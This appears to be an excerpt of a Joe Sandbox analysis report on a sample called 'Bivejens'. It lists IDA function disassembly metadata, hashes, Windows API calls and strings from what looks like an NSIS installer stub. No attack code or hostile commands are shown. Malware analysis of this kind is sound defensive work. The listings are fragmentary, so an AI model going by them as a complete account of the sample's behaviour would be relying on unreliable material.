Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21b30000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ff913700d5a5e2832f236511e0f42aed58c17c120416c15431ab7666b5c39f
Instruction ID: 7e079b56c37c504c8932154ad2f67ed693fcd03a55ddfd2bb42fa781cb6d589a
Opcode Fuzzy Hash: 00ff913700d5a5e2832f236511e0f42aed58c17c120416c15431ab7666b5c39f
Instruction Fuzzy Hash: F051A574E00648CFDB48DFAAD484A9DBBF2BF8D310F248169D819AB365DB319942CF10

Function 21090853 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2617313145.0000000021090000.00000040.00000800.00020000.00000000.sdmp, Offset: 21090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_21090000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 849306d093288899f044d879c53d7389d84e57d47be9794f84bcc7ffabef2e3d
Instruction ID: ab6076622b0be738db6a01f7451fe56d61277c5983176225d5c6a09449ae0ca1
Opcode Fuzzy Hash: 849306d093288899f044d879c53d7389d84e57d47be9794f84bcc7ffabef2e3d
Instruction Fuzzy Hash: E8516E74A01228CFDB65DF24C894B9ABBB2BB4A301F5095E9D80EA7350DB359E81CF50

Function 00401941 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ae5c0a5b1e227b863e4676917699584e0ffc96e718b7c48018a006ff89a48536
Instruction ID: 0ef2e9fcbf8ba9e8a741b32dbec3ccc9dbe9a4eacd635e405ca03246bc1772eb
Opcode Fuzzy Hash: ae5c0a5b1e227b863e4676917699584e0ffc96e718b7c48018a006ff89a48536
Instruction Fuzzy Hash: B2C01273B04100DBCB10EBEDAA4588E73A4DB443393304677E111F11E5D579D9515A39

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405489
GetDlgItem.USER32(?,000003EE), ref: 00405498
GetClientRect.USER32(?,?), ref: 004054D5
GetSystemMetrics.USER32(?), ref: 004054DC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
ShowWindow.USER32(00000000,?,?,000000FF), ref: 00405564
ShowWindow.USER32(?,?), ref: 00405578
GetDlgItem.USER32(?,000003EC), ref: 00405599
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
GetDlgItem.USER32(?,000003F8), ref: 004054A7

Part of subcall function 00404230: SendMessageW.USER32(?,?,?,0040405B), ref: 0040423E

GetDlgItem.USER32(?,000003EC), ref: 004055EB
CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
CloseHandle.KERNEL32(00000000), ref: 00405600
ShowWindow.USER32(00000000), ref: 00405624
ShowWindow.USER32(?,?), ref: 00405629
ShowWindow.USER32(?), ref: 00405673
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
CreatePopupMenu.USER32 ref: 004056B8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
GetWindowRect.USER32(?,?), ref: 004056EC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
OpenClipboard.USER32(00000000), ref: 0040574D
EmptyClipboard.USER32 ref: 00405753
GlobalAlloc.KERNEL32(?,00000000), ref: 0040575F
GlobalLock.KERNEL32(00000000), ref: 00405769
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
GlobalUnlock.KERNEL32(00000000), ref: 0040579D
SetClipboardData.USER32(?,00000000), ref: 004057A8
CloseClipboard.USER32 ref: 004057AE

Strings

{, xrefs: 00405691
6B, xrefs: 00405719

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
Opcode Fuzzy Hash: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,?), ref: 00403D5E
ShowWindow.USER32(?), ref: 00403D7B
DestroyWindow.USER32 ref: 00403D8F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
GetDlgItem.USER32(?,?), ref: 00403DCC
SendMessageW.USER32(00000000,?,00000000,00000000), ref: 00403DE0
IsWindowEnabled.USER32(00000000), ref: 00403DE7
GetDlgItem.USER32(?,?), ref: 00403E95
GetDlgItem.USER32(?,?), ref: 00403E9F
SetClassLongW.USER32(?,?,?), ref: 00403EB9
SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F0A
GetDlgItem.USER32(?,?), ref: 00403FB0
ShowWindow.USER32(00000000,?), ref: 00403FD1
EnableWindow.USER32(?,?), ref: 00403FE3
EnableWindow.USER32(?,?), ref: 00403FFE
GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404014
EnableMenuItem.USER32(00000000), ref: 0040401B
SendMessageW.USER32(?,?,00000000,?), ref: 00404033
SendMessageW.USER32(?,00000401,?,00000000), ref: 00404046
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
SetWindowTextW.USER32(?,004236E8), ref: 00404084
ShowWindow.USER32(?,?), ref: 004041B8

Strings

6B, xrefs: 00404060

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: 6B
API String ID: 184305955-4127139157
Opcode ID: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
Opcode Fuzzy Hash: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

Function 00403974 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,?,?,004033CB,?), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,?,00437800,774D3420,00435000,00000000), ref: 004039F5
lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,?,00437800), ref: 00403A75
lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
GetFileAttributesW.KERNEL32(004281A0), ref: 00403A93
LoadImageW.USER32(?,?,00000000,00000000,00008040,00435800), ref: 00403ADC

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

RegisterClassW.USER32(004291A0), ref: 00403B19
SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403B31
CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
ShowWindow.USER32(?,00000000), ref: 00403B9C
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
RegisterClassW.USER32(004291A0), ref: 00403BDE
DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD

Strings

RichEdit20W, xrefs: 00403BC0, 00403BC6
.exe, xrefs: 00403A82
Control Panel\Desktop\ResourceLocale, xrefs: 004039A8
6B, xrefs: 004039A0
_Nb, xrefs: 00403AF8, 00403B60
RichEdit, xrefs: 00403BCF
.DEFAULT\Control Panel\International, xrefs: 004039E0
RichEd32, xrefs: 00403BB0
RichEd20, xrefs: 00403BA2

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-949986762
Opcode ID: 1025ef68fa71260cdfb27955bbf6984406ebeef229d88fb4c4602e04cc0b9dff
Instruction ID: 9910424c6ca31f4cc559053cc35dfc0eeb30f3212361bd75bc0ff30566f1833d
Opcode Fuzzy Hash: 1025ef68fa71260cdfb27955bbf6984406ebeef229d88fb4c4602e04cc0b9dff
Instruction Fuzzy Hash: C961B870244600BFE630AF269D46F273A6CEB44B49F40057EF985B62E2DB7D5911CA2D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14

Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
wsprintfA.USER32 ref: 00405F4F
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,?,00427588,?,?,?,?,?), ref: 00405F8A
GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405F99
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
GlobalFree.KERNEL32(00000000), ref: 00406038
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F

Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,?,?,?,?,?), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405DA0

Strings

[Rename], xrefs: 00405FB9, 00405FCB
%ls=%ls, xrefs: 00405F45

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
Opcode Fuzzy Hash: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD

Function 00402EDD Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,?,?,?), ref: 00402F0A

Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,?,?,?,?,?), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,?,?,?), ref: 00405DA0

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,?,?,?,?,?), ref: 00402F56

Strings

Error launching installer, xrefs: 00402F2D
soft, xrefs: 00402FCB
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
Inst, xrefs: 00402FC2
Null, xrefs: 00402FD4

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,?), ref: 0040427F
GetSysColor.USER32(00000000), ref: 004042BD
SetTextColor.GDI32(?,00000000), ref: 004042C9
SetBkMode.GDI32(?,?), ref: 004042D5
GetSysColor.USER32(?), ref: 004042E8
SetBkColor.GDI32(?,?), ref: 004042F8
DeleteObject.GDI32(?), ref: 00404312
CreateBrushIndirect.GDI32(?), ref: 0040431C

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00402714
MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040272A

Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E71

SetFilePointer.KERNEL32(?,?,?,?,?,?,?), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403177
GetTickCount.KERNEL32 ref: 004031F8
MulDiv.KERNEL32(7FFFFFFF,?,00000000), ref: 00403225
wsprintfW.USER32 ref: 00403238

Strings

... %d%%, xrefs: 00403232

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
Opcode Fuzzy Hash: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

Function 00406518 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,774D3420,004035A3,?,?,?,?), ref: 0040657B
CharNextW.USER32(?,?,?,00000000,?,?,?,?), ref: 0040658A
CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,774D3420,004035A3,?,?,?,?), ref: 0040658F
CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,774D3420,004035A3,?,?,?,?), ref: 004065A2

Strings

*?|<>/":, xrefs: 0040656A

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction ID: 9d8e3f8f3784457604ea521ff392e3c8e3efc90107dbe880bee10e7696629eb6
Opcode Fuzzy Hash: f2dbc7d310367101a7bf5127f564121aa95c210a65fb008c6410ea5a4ac792ac
Instruction Fuzzy Hash: AB11B655800616A5DB303B18BC44A7762F8AF54B60F92403FED89736C5F77C5C9286BD

Function 0040176F Relevance: 7.6, APIs: 5, Instructions: 145stringtimeCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(00000000,00000000,0040A5A8,00436000,?,?,?), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,0040A5A8,0040A5A8,00000000,00000000,0040A5A8,00436000,?,?,?), ref: 004017D5

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,?,?,?), ref: 00406291

Part of subcall function 004052EC: lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
Part of subcall function 004052EC: lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
Part of subcall function 004052EC: SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
Opcode Fuzzy Hash: 590c3d2934c31b3987365f8331b25d81c0607cb668f8e26b6ea01865aa0ee0af
Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D63
GetClientRect.USER32(00000000,?), ref: 00401D70
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
DeleteObject.GDI32(00000000), ref: 00401DAE

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

